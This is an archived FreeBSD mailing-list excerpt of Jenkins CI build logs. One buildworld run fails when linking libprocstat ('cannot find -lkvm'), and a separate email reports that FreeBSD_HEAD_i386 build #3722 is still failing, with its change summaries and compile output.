-MF.depend.bss_dgram.o -MTbss_dgram.o = -std=3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wn= o-string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno= -unused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conv= ersion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-prom= oted-parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/F= reeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss= _dgram.c -o bss_dgram.o --- lib/msun__L --- --- s_ctanhf.So --- cc -fpic -DPIC -g -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/= x86 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/= FreeBSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/ms= un/src -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/wor= kspace/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_ctanhf.So -MTs_c= tanhf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wn= o-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -W= no-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-p= arentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-l= ocal-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-= parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/= msun/src/s_ctanhf.c -o s_ctanhf.So --- e_remainder.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_remainder.So -MTe_re= mainder.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -= Wno-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int = -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno= -parentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused= -local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wn= o-parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src= /lib/msun/amd64/e_remainder.S -o e_remainder.So --- lib/libprocstat__L --- --- smbfs.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.smbfs.So -MTsmb= fs.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wall = -Wno-format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prot= otypes -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -= Wshadow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wnested= -externs -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wmissi= ng-variable-declarations -Wthread-safety -Wno-empty-body -Wno-string-plus-i= nt -Wno-unused-const-variable -Qunused-arguments -c /builds/workspace/Fre= eBSD_HEAD/src/lib/libprocstat/smbfs.c -o smbfs.So --- lib/msun__L --- --- e_remainderf.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_remainderf.So -MTe_r= emainderf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror= -Wno-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-in= t -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-value -W= no-parentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unus= ed-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -= Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/s= rc/lib/msun/amd64/e_remainderf.S -o e_remainderf.So --- e_remainderl.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_remainderl.So -MTe_r= emainderl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror= -Wno-pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-in= t -Wno-unused-const-variable -Wno-tautological-compare -Wno-unused-value -W= no-parentheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unus= ed-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -= Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/s= rc/lib/msun/amd64/e_remainderl.S -o e_remainderl.So --- e_sqrt.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_sqrt.So -MTe_sqrt.So= -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-pointe= r-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unuse= d-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenthes= es-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-typ= edef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parenthe= ses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msun/= amd64/e_sqrt.S -o e_sqrt.So --- e_sqrtf.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_sqrtf.So -MTe_sqrtf.= So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-poin= ter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unu= sed-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenth= eses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-t= ypedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parent= heses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msu= n/amd64/e_sqrtf.S -o e_sqrtf.So --- lib/libprocstat__L --- --- udf.So --- cc -fpic -DPIC -g -O2 -pipe -I. -I/builds/workspace/FreeBSD_HEAD/src/lib= /libprocstat -D_KVM_VNODE -DLIBPROCSTAT_ZFS -MD -MF.depend.udf.So -MTudf.S= o -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wall -Wno= -format-y2k -W -Wno-unused-parameter -Wstrict-prototypes -Wmissing-prototyp= es -Wpointer-arith -Wreturn-type -Wcast-qual -Wwrite-strings -Wswitch -Wsha= dow -Wunused-parameter -Wcast-align -Wchar-subscripts -Winline -Wnested-ext= erns -Wredundant-decls -Wold-style-definition -Wno-pointer-sign -Wmissing-v= ariable-declarations -Wthread-safety -Wno-empty-body -Wno-string-plus-int -= Wno-unused-const-variable -Qunused-arguments -c /builds/workspace/FreeBSD= _HEAD/src/lib/libprocstat/udf.c -o udf.So --- lib/msun__L --- --- e_sqrtl.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.e_sqrtl.So -MTe_sqrtl.= So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-poin= ter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unu= sed-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenth= eses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-t= ypedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parent= heses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msu= n/amd64/e_sqrtl.S -o e_sqrtl.So --- secure/lib/libcrypto__L --- --- bss_fd.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bss_fd.o -MTbss_fd.o -std= =3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-st= ring-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-unu= sed-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conversi= on -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted= -parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_fd.= c -o bss_fd.o --- lib/msun__L --- --- s_llrint.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_llrint.So -MTs_llrin= t.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/m= sun/amd64/s_llrint.S -o s_llrint.So --- s_llrintf.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_llrintf.So -MTs_llri= ntf.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib= /msun/amd64/s_llrintf.S -o s_llrintf.So --- lib/libprocstat__L --- --- libprocstat.a --- building static procstat library ar -crD libprocstat.a `NM=3D'nm' NMFLAGS=3D'' lorder zfs/zfs.o cd9660.o com= mon_kvm.o core.o libprocstat.o msdosfs.o smbfs.o udf.o | tsort -q`=20 --- lib/msun__L --- --- s_llrintl.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_llrintl.So -MTs_llri= ntl.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-= pointer-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno= -unused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-par= entheses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-loc= al-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pa= rentheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib= /msun/amd64/s_llrintl.S -o s_llrintl.So --- lib/libprocstat__L --- ranlib -D libprocstat.a --- Version.map --- cat /builds/workspace/FreeBSD_HEAD/src/lib/libprocstat/Symbol.map | cpp - = - | awk -v vfile=3D/builds/workspace/FreeBSD_HEAD/src/lib/libprocstat/Vers= ions.def -f /builds/workspace/FreeBSD_HEAD/src/share/mk/version_gen.awk > V= ersion.map --- lib/msun__L --- --- s_logbl.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_logbl.So -MTs_logbl.= So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-poin= ter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unu= sed-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenth= eses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-t= ypedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parent= heses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msu= n/amd64/s_logbl.S -o s_logbl.So --- lib/libprocstat__L --- --- libprocstat.so.1.full --- building shared library libprocstat.so.1 cc -Wl,--version-script=3DVersion.map -fstack-protector-strong -shared -Wl= ,-x -Wl,--fatal-warnings -Wl,--warn-shared-textrel -o libprocstat.so.1.ful= l -Wl,-soname,libprocstat.so.1 `NM=3D'nm' NMFLAGS=3D'' lorder zfs/zfs.So z= fs/zfs.So cd9660.So common_kvm.So core.So libprocstat.So msdosfs.So smbfs.S= o udf.So | tsort -q` -lelf -lkvm -lutil --- lib/msun__L --- --- s_lrint.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_lrint.So -MTs_lrint.= So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-poin= ter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-unu= sed-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-parenth= eses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local-t= ypedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-parent= heses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/msu= n/amd64/s_lrint.S -o s_lrint.So --- secure/lib/libcrypto__L --- --- bss_file.o --- cc -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/= ../../../crypto/openssl -DTERMIOS -DANSI_SOURCE -DOPENSSL_THREADS -DDSO_DLF= CN -DHAVE_DLFCN_H -DL_ENDIAN -DOPENSSL_IA32_SSE2 -DAES_ASM -DBSAES_ASM -DVP= AES_ASM -DECP_NISTZ256_ASM -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DO= PENSSL_BN_ASM_GF2m -DMD5_ASM -DGHASH_ASM -DSHA1_ASM -DSHA256_ASM -DSHA512_A= SM -DWHIRLPOOL_ASM -I/builds/workspace/FreeBSD_HEAD/obj/builds/workspace/Fr= eeBSD_HEAD/src/secure/lib/libcrypto -I/builds/workspace/FreeBSD_HEAD/src/se= cure/lib/libcrypto/../../../crypto/openssl/crypto -I/builds/workspace/FreeB= SD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/asn1 -I/bui= lds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl= /crypto/evp -I/builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypto/../..= /../crypto/openssl/crypto/modes -MD -MF.depend.bss_file.o -MTbss_file.o -s= td=3Dgnu89 -fstack-protector-strong -Wno-pointer-sign -Wno-empty-body -Wno-= string-plus-int -Wno-unused-const-variable -Wno-tautological-compare -Wno-u= nused-value -Wno-parentheses-equality -Wno-unused-function -Wno-enum-conver= sion -Wno-unused-local-typedef -Wno-switch -Wno-switch-enum -Wno-knr-promot= ed-parameter -Wno-parentheses -Qunused-arguments -c /builds/workspace/Fre= eBSD_HEAD/src/secure/lib/libcrypto/../../../crypto/openssl/crypto/bio/bss_f= ile.c -o bss_file.o --- lib/libprocstat__L --- /builds/workspace/FreeBSD_HEAD/obj/builds/workspace/FreeBSD_HEAD/src/tmp/us= r/bin/ld: cannot find -lkvm cc: error: linker command failed with exit code 1 (use -v to see invocation= ) --- lib/msun__L --- --- s_lrintf.So --- cc -fpic -DPIC -O2 -pipe -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/x86 = -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/ld80 -I/builds/workspace/Free= BSD_HEAD/src/lib/msun/amd64 -I/builds/workspace/FreeBSD_HEAD/src/lib/msun/s= rc -I/builds/workspace/FreeBSD_HEAD/src/lib/libc/include -I/builds/workspa= ce/FreeBSD_HEAD/src/lib/libc/amd64 -MD -MF.depend.s_lrintf.So -MTs_lrint= f.So -std=3Dgnu99 -fstack-protector-strong -Wsystem-headers -Werror -Wno-po= inter-sign -Wno-unknown-pragmas -Wno-empty-body -Wno-string-plus-int -Wno-u= nused-const-variable -Wno-tautological-compare -Wno-unused-value -Wno-paren= theses-equality -Wno-unused-function -Wno-enum-conversion -Wno-unused-local= -typedef -Wno-switch -Wno-switch-enum -Wno-knr-promoted-parameter -Wno-pare= ntheses -Qunused-arguments -c /builds/workspace/FreeBSD_HEAD/src/lib/m= sun/amd64/s_lrintf.S -o s_lrintf.So --- lib/libprocstat__L --- *** [libprocstat.so.1.full] Error code 1 bmake[4]: stopped in /builds/workspace/FreeBSD_HEAD/src/lib/libprocstat 1 error bmake[4]: stopped in /builds/workspace/FreeBSD_HEAD/src/lib/libprocstat *** [lib/libprocstat__L] Error code 2 bmake[3]: stopped in /builds/workspace/FreeBSD_HEAD/src --- lib/msun__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /builds/workspace/FreeBSD_HEAD/src/lib/msun *** [lib/msun__L] Error code 2 bmake[3]: stopped in /builds/workspace/FreeBSD_HEAD/src --- secure/lib/libcrypto__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /builds/workspace/FreeBSD_HEAD/src/secure/lib/libcrypt= o *** [secure/lib/libcrypto__L] Error code 2 bmake[3]: stopped in /builds/workspace/FreeBSD_HEAD/src --- lib/libc++__L --- A failure has been detected in another branch of the parallel make bmake[4]: stopped in /builds/workspace/FreeBSD_HEAD/src/lib/libc++ *** [lib/libc++__L] Error code 2 bmake[3]: stopped in /builds/workspace/FreeBSD_HEAD/src 4 errors bmake[3]: stopped in /builds/workspace/FreeBSD_HEAD/src *** [libraries] Error code 2 bmake[2]: stopped in /builds/workspace/FreeBSD_HEAD/src 1 error bmake[2]: stopped in /builds/workspace/FreeBSD_HEAD/src *** [_libraries] Error code 2 bmake[1]: stopped in /builds/workspace/FreeBSD_HEAD/src 1 error bmake[1]: stopped in /builds/workspace/FreeBSD_HEAD/src *** [buildworld] Error code 2 make: stopped in /builds/workspace/FreeBSD_HEAD/src 1 error make: stopped in /builds/workspace/FreeBSD_HEAD/src [Pipeline] } [Pipeline] // withEnv [Pipeline] } [Pipeline] // dir [Pipeline] } [Pipeline] // node [Pipeline] node Running on master in /usr/local/jenkins/workspace/FreeBSD_HEAD [Pipeline] { [Pipeline] step From owner-freebsd-current@freebsd.org Sat Jul 30 06:15:43 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 943CDBA8E14; Sat, 30 Jul 2016 06:15:43 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (jenkins-9.freebsd.org [8.8.178.209]) by mx1.freebsd.org (Postfix) with ESMTP id 7FF2411F9; Sat, 30 Jul 2016 06:15:43 +0000 (UTC) (envelope-from jenkins-admin@FreeBSD.org) Received: from jenkins-9.freebsd.org (localhost [127.0.0.1]) by jenkins-9.freebsd.org (Postfix) with ESMTP id A99451A2; Sat, 30 Jul 2016 06:15:43 +0000 (UTC) Date: Sat, 30 Jul 2016 06:15:40 +0000 (GMT) From: jenkins-admin@FreeBSD.org To: markj@FreeBSD.org, ngie@FreeBSD.org, jenkins-admin@FreeBSD.org, freebsd-current@FreeBSD.org, freebsd-i386@FreeBSD.org Message-ID: <265214000.62.1469859343703.JavaMail.jenkins@jenkins-9.freebsd.org> In-Reply-To: <1700567250.59.1469849576789.JavaMail.jenkins@jenkins-9.freebsd.org> References: <1700567250.59.1469849576789.JavaMail.jenkins@jenkins-9.freebsd.org> Subject: FreeBSD_HEAD_i386 - Build #3722 - Still Failing MIME-Version: 1.0 X-Jenkins-Job: FreeBSD_HEAD_i386 X-Jenkins-Result: FAILURE Precedence: bulk Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Content-Filtered-By: Mailman/MimeDel 2.1.22 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 30 Jul 2016 06:15:43 -0000 FreeBSD_HEAD_i386 - Build #3722 - Still Failing: Build information: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3722/ Full change log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3722/cha= nges Full build log: https://jenkins.FreeBSD.org/job/FreeBSD_HEAD_i386/3722/cons= ole Change summaries: 303538 by ngie: Explicitly test for cu_fgets returning NULL or !NULL MFC after: 3 weeks Sponsored by: EMC / Isilon Storage Division 303537 by markj: Add libprocstat prebuild library dependencies. X-MFC-With:=09r303531 The end of the build log: [...truncated 157927 lines...] --- vnode_if_newproto.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -p --- vnode_if_typedef.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -q --- vnode_if.h --- awk -f /usr/src/sys/tools/vnode_if.awk /usr/src/sys/kern/vnode_if.src -h --- systrace.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -I/usr/src/sys/cddl/compat/opensolaris -I/usr/src/sys/cddl/contrib/opens= olaris/uts/common -I/usr/src/sys -DHAVE_KERNEL_OPTION_HEADERS -include /usr= /obj/usr/src/sys/GENERIC/opt_global.h -I. -I/usr/src/sys -fno-common -g -I/= usr/obj/usr/src/sys/GENERIC -MD -MF.depend.systrace.o -MTsystrace.o -mno-= mmx -mno-sse -msoft-float -ffreestanding -fwrapv -fstack-protector -gdwarf-= 2 -Wall -Wredundant-decls -Wnested-externs -Wstrict-prototypes -Wmissing-pr= ototypes -Wpointer-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D_= _printf__=3D__freebsd_kprintf__ -Wmissing-include-dirs -fdiagnostics-show-o= ption -Wno-unknown-pragmas -Wno-error-tautological-compare -Wno-error-empty= -body -Wno-error-parentheses-equality -Wno-error-unused-function -Wno-error= -pointer-sign -Wno-error-shift-negative-value -mno-aes -mno-avx -std=3Dis= o9899:1999 -include /usr/src/sys/cddl/compat/opensolaris/sys/debug_compat.h= -c /usr/src/sys/cddl/dev/systrace/systrace.c -o systrace.o --- all_subdir_drm2 --- ctfconvert -L VERSION -g ttm_execbuf_util.o --- ttm_memory.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ttm_memory.o -MTttm_memory.o -mno-mmx -mno-sse -msoft-float= -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredundant-decls= -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointer-arith = -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__freebsd_kpr= intf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknown-pragma= s -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-parenthe= ses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wno-error-= shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /usr/src/sy= s/modules/drm2/drm2/../../../dev/drm2/ttm/ttm_memory.c -o ttm_memory.o ctfconvert -L VERSION -g ttm_memory.o --- ttm_page_alloc.o --- cc -O2 -pipe -fno-strict-aliasing -Werror -D_KERNEL -DKLD_MODULE -nostdin= c -DHAVE_KERNEL_OPTION_HEADERS -include /usr/obj/usr/src/sys/GENERIC/opt_= global.h -I. -I/usr/src/sys -fno-common -g -I/usr/obj/usr/src/sys/GENERIC = -MD -MF.depend.ttm_page_alloc.o -MTttm_page_alloc.o -mno-mmx -mno-sse -mso= ft-float -ffreestanding -fwrapv -fstack-protector -gdwarf-2 -Wall -Wredunda= nt-decls -Wnested-externs -Wstrict-prototypes -Wmissing-prototypes -Wpointe= r-arith -Winline -Wcast-qual -Wundef -Wno-pointer-sign -D__printf__=3D__fre= ebsd_kprintf__ -Wmissing-include-dirs -fdiagnostics-show-option -Wno-unknow= n-pragmas -Wno-error-tautological-compare -Wno-error-empty-body -Wno-error-= parentheses-equality -Wno-error-unused-function -Wno-error-pointer-sign -Wn= o-error-shift-negative-value -mno-aes -mno-avx -std=3Diso9899:1999 -c /us= r/src/sys/modules/drm2/drm2/../../../dev/drm2/ttm/ttm_page_alloc.c -o ttm_p= age_alloc.o --- all_subdir_drm --- ctfconvert -L VERSION -g via_dma.o --- via.kld --- ld -d -warn-common -r -d -o via.kld via_dma.o via_dmablit.o via_drv.o via_i= rq.o via_map.o via_mm.o via_verifier.o via_video.o ctfmerge -L VERSION -g -o via.kld via_dma.o via_dmablit.o via_drv.o via_irq= .o via_map.o via_mm.o 